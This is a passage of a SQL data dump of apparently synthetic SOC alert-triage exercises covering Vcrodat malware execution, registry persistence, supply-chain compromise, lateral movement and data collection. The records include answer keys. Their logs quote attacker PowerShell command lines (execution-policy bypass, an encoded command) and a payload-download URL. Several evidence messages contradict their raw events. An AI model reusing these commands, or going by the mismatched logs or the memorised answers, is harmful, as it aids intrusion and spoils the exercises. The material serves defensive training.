'{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP address associated with previous phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host targeted by phishing email.\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://malicious-example.com/download\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware URL Database\",\"verdict\":\"malicious\",\"details\":\"URL hosting a known malicious payload.\"}},{\"id\":\"artifact_4\",\"type\":\"email\",\"value\":\"hacker@example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Email Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Email address associated with phishing 
activities.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"2b8e5d8f7e9c4f8a9b6e5d9f7c6b8e5d\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash identified as a malicious payload.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(397, 'Execution of Malicious Script', 'high', 'Endpoint Detection and Response (EDR)', 'An advanced malicious script execution was detected on the endpoint, aiming to establish a foothold by deploying the Vcrodat malware. The script was initially downloaded via a phishing link.', 'Execution', 'T1059.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:32:08Z\",\"event_type\":\"execution\",\"host\":{\"hostname\":\"compromised-endpoint\",\"ip\":\"192.168.1.105\"},\"user\":\"jdoe\",\"process\":{\"name\":\"powershell.exe\",\"pid\":4567,\"command_line\":\"powershell -ExecutionPolicy Bypass -File C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\malicious_script.ps1\"},\"file\":{\"path\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\malicious_script.ps1\",\"hash\":\"3f786850e387550fdab836ed7e6dc881de23001b\"},\"network\":{\"source_ip\":\"192.168.1.105\",\"destination_ip\":\"203.0.113.45\",\"destination_port\":80},\"malware\":{\"name\":\"Vcrodat\",\"signature_version\":\"1.2.3\",\"hash\":\"6a2da3a46e0f4e8b8a7d4b2a2c8e7a5f\"}}', '2026-01-04 02:15:53', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with known malware distribution.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"3f786850e387550fdab836ed7e6dc881de23001b\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash detected in previous malware incidents.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"6a2da3a46e0f4e8b8a7d4b2a2c8e7a5f\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash matches the Vcrodat malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"malicious_script.ps1\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal 
Analysis\",\"verdict\":\"suspicious\",\"details\":\"Filename typically used in phishing attacks.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"internal\",\"details\":\"Employee account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(398, 'Vcrodat Malware Persistence Mechanism', 'high', 'System Logs', 'The Vcrodat malware has been observed manipulating registry keys for persistence. This is a known tactic of the Whitefly group to ensure continuous access to compromised systems. The malware modifies the registry key to execute a malicious payload upon system startup.', 'Persistence', 'T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:32:21Z\",\"source_ip\":\"103.245.222.133\",\"destination_ip\":\"192.168.1.15\",\"username\":\"jdoe\",\"registry_key\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\MaliciousApp\",\"registry_value_name\":\"MaliciousApp\",\"registry_value_data\":\"C:\\\\Windows\\\\System32\\\\ncsvc.exe\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"process_id\":4824,\"process_name\":\"ncsvc.exe\"}', '2026-01-04 02:15:53', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"103.245.222.133\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known command and control server.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Database\",\"verdict\":\"internal\",\"details\":\"Internal workstation.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Associated with Vcrodat malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"ncsvc.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Malicious executable used for 
persistence.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"suspicious\",\"details\":\"User\'s account may be compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.001Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:21Z\\\",\\\"source_ip\\\":\\\"103.245.222.133\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"jdoe\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousApp\\\",\\\"registry_value_name\\\":\\\"MaliciousApp\\\",\\\"registry_value_data\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\ncsvc.exe\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"process_id\\\":4824,\\\"process_name\\\":\\\"ncsvc.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.001Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. 
[Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:21Z\\\",\\\"source_ip\\\":\\\"103.245.222.133\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"jdoe\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousApp\\\",\\\"registry_value_name\\\":\\\"MaliciousApp\\\",\\\"registry_value_data\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\ncsvc.exe\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"process_id\\\":4824,\\\"process_name\\\":\\\"ncsvc.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.001Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:21Z\\\",\\\"source_ip\\\":\\\"103.245.222.133\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"jdoe\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousApp\\\",\\\"registry_value_name\\\":\\\"MaliciousApp\\\",\\\"registry_value_data\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\ncsvc.exe\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"process_id\\\":4824,\\\"process_name\\\":\\\"ncsvc.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.001Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. 
[Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:21Z\\\",\\\"source_ip\\\":\\\"103.245.222.133\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"jdoe\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousApp\\\",\\\"registry_value_name\\\":\\\"MaliciousApp\\\",\\\"registry_value_data\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\ncsvc.exe\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"process_id\\\":4824,\\\"process_name\\\":\\\"ncsvc.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.001Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:21Z\\\",\\\"source_ip\\\":\\\"103.245.222.133\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"jdoe\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousApp\\\",\\\"registry_value_name\\\":\\\"MaliciousApp\\\",\\\"registry_value_data\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\ncsvc.exe\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"process_id\\\":4824,\\\"process_name\\\":\\\"ncsvc.exe\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0),
(399, 'Compromised Open-Source Tool Identified', 'high', 'Open-Source Intelligence (OSINT)', 'An open-source tool frequently used by developers has been modified to include malicious code. The tool is leveraging legitimate traffic patterns to avoid detection by security systems. The malicious code attempts to establish a connection with a known malicious IP and downloads additional payloads.', 'Initial Access', 'T1195.001 - Supply Chain Compromise: Compromise Software Dependencies and Development Tools', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:25:36Z\",\"event_id\":\"EVT-1004\",\"source_ip\":\"192.168.1.10\",\"destination_ip\":\"203.0.113.45\",\"user\":\"jdoe\",\"tool_name\":\"OpenSourceDevTool\",\"malicious_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"file_path\":\"/usr/local/bin/OpenSourceDevTool\",\"action\":\"download\",\"payload_url\":\"http://malicious.example.com/payload\",\"status\":\"success\"}', '2026-01-04 02:15:53', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"malicious\",\"details\":\"IP associated with known malicious activities\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware signature\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"/usr/local/bin/OpenSourceDevTool\",\"is_critical\":false,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"suspicious\",\"details\":\"Modified version of a known open-source tool\"}},{\"id\":\"artifact_4\",\"type\":\"url\",\"value\":\"http://malicious.example.com/payload\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"malicious\",\"details\":\"URL hosting malicious 
payload\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.002Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:25:36Z\\\",\\\"event_id\\\":\\\"EVT-1004\\\",\\\"source_ip\\\":\\\"192.168.1.10\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"tool_name\\\":\\\"OpenSourceDevTool\\\",\\\"malicious_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"file_path\\\":\\\"/usr/local/bin/OpenSourceDevTool\\\",\\\"action\\\":\\\"download\\\",\\\"payload_url\\\":\\\"http://malicious.example.com/payload\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.002Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:25:36Z\\\",\\\"event_id\\\":\\\"EVT-1004\\\",\\\"source_ip\\\":\\\"192.168.1.10\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"tool_name\\\":\\\"OpenSourceDevTool\\\",\\\"malicious_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"file_path\\\":\\\"/usr/local/bin/OpenSourceDevTool\\\",\\\"action\\\":\\\"download\\\",\\\"payload_url\\\":\\\"http://malicious.example.com/payload\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.002Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:25:36Z\\\",\\\"event_id\\\":\\\"EVT-1004\\\",\\\"source_ip\\\":\\\"192.168.1.10\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"tool_name\\\":\\\"OpenSourceDevTool\\\",\\\"malicious_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"file_path\\\":\\\"/usr/local/bin/OpenSourceDevTool\\\",\\\"action\\\":\\\"download\\\",\\\"payload_url\\\":\\\"http://malicious.example.com/payload\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.002Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:25:36Z\\\",\\\"event_id\\\":\\\"EVT-1004\\\",\\\"source_ip\\\":\\\"192.168.1.10\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"tool_name\\\":\\\"OpenSourceDevTool\\\",\\\"malicious_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"file_path\\\":\\\"/usr/local/bin/OpenSourceDevTool\\\",\\\"action\\\":\\\"download\\\",\\\"payload_url\\\":\\\"http://malicious.example.com/payload\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.002Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:25:36Z\\\",\\\"event_id\\\":\\\"EVT-1004\\\",\\\"source_ip\\\":\\\"192.168.1.10\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"tool_name\\\":\\\"OpenSourceDevTool\\\",\\\"malicious_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"file_path\\\":\\\"/usr/local/bin/OpenSourceDevTool\\\",\\\"action\\\":\\\"download\\\",\\\"payload_url\\\":\\\"http://malicious.example.com/payload\\\",\\\"status\\\":\\\"success\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(400, 'Unauthorized Credentials Accessed', 'high', 'Security Information and Event Management (SIEM)', 'Compromised credentials were used by the attacker to perform lateral movement within the network. The attacker, associated with the Whitefly group, utilized stolen credentials to access multiple systems, potentially exfiltrating sensitive data.', 'Lateral Movement', 'T1078 - Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"event_type\":\"authentication\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.25\",\"username\":\"jdoe_admin\",\"action\":\"login_success\",\"details\":{\"method\":\"RDP\",\"malware_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"filename\":\"whitefly_tool.exe\"},\"network\":{\"src_port\":3389,\"dest_port\":3389}}', '2026-01-04 02:15:53', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with Whitefly APT activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address within corporate network.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe_admin\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal User Database\",\"verdict\":\"suspicious\",\"details\":\"Admin account used in unauthorized manner.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a tool used by Whitefly for lateral movement.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"whitefly_tool.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware 
Repository\",\"verdict\":\"malicious\",\"details\":\"File used in conjunction with Whitefly\'s attack strategies.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Advanced', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.004Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_type\\\":\\\"authentication\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"jdoe_admin\\\",\\\"action\\\":\\\"login_success\\\",\\\"details\\\":{\\\"method\\\":\\\"RDP\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"whitefly_tool.exe\\\"},\\\"network\\\":{\\\"src_port\\\":3389,\\\"dest_port\\\":3389}}\"},{\"timestamp\":\"2026-02-01T20:31:19.004Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_type\\\":\\\"authentication\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"jdoe_admin\\\",\\\"action\\\":\\\"login_success\\\",\\\"details\\\":{\\\"method\\\":\\\"RDP\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"whitefly_tool.exe\\\"},\\\"network\\\":{\\\"src_port\\\":3389,\\\"dest_port\\\":3389}}\"},{\"timestamp\":\"2026-02-01T20:30:19.004Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_type\\\":\\\"authentication\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"jdoe_admin\\\",\\\"action\\\":\\\"login_success\\\",\\\"details\\\":{\\\"method\\\":\\\"RDP\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"whitefly_tool.exe\\\"},\\\"network\\\":{\\\"src_port\\\":3389,\\\"dest_port\\\":3389}}\"},{\"timestamp\":\"2026-02-01T20:29:19.004Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_type\\\":\\\"authentication\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"jdoe_admin\\\",\\\"action\\\":\\\"login_success\\\",\\\"details\\\":{\\\"method\\\":\\\"RDP\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"whitefly_tool.exe\\\"},\\\"network\\\":{\\\"src_port\\\":3389,\\\"dest_port\\\":3389}}\"},{\"timestamp\":\"2026-02-01T20:28:19.004Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_type\\\":\\\"authentication\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"jdoe_admin\\\",\\\"action\\\":\\\"login_success\\\",\\\"details\\\":{\\\"method\\\":\\\"RDP\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"whitefly_tool.exe\\\"},\\\"network\\\":{\\\"src_port\\\":3389,\\\"dest_port\\\":3389}}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(401, 'Unusual Data Access Patterns Detected', 'high', 'Data Loss Prevention (DLP)', 'Sensitive patient data and proprietary information from materials science research were accessed in a manner indicative of preparation for data exfiltration. The activity was detected originating from an internal network, accessing multiple sensitive files in quick succession, and communicating to an external IP address known for malicious activities.', 'Collection', 'T1119', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"event_id\":\"dlp-collection-56789\",\"source_ip\":\"10.1.1.5\",\"destination_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"accessed_files\":[\"/research/patient_data/sensitive_data.xlsx\",\"/research/materials_science/proprietary_formula.docx\"],\"file_hashes\":[\"d41d8cd98f00b204e9800998ecf8427e\",\"5eb63bbbe01eeed093cb22bb8f5acdc3\"],\"malware_hash\":\"e99a18c428cb38d5f260853678922e03\",\"alert_reason\":\"Multiple sensitive files accessed and malware hash detected.\"}', '2026-01-04 02:15:53', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT group.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal HR Database\",\"verdict\":\"internal\",\"details\":\"Employee of the company.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with data exfiltration malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
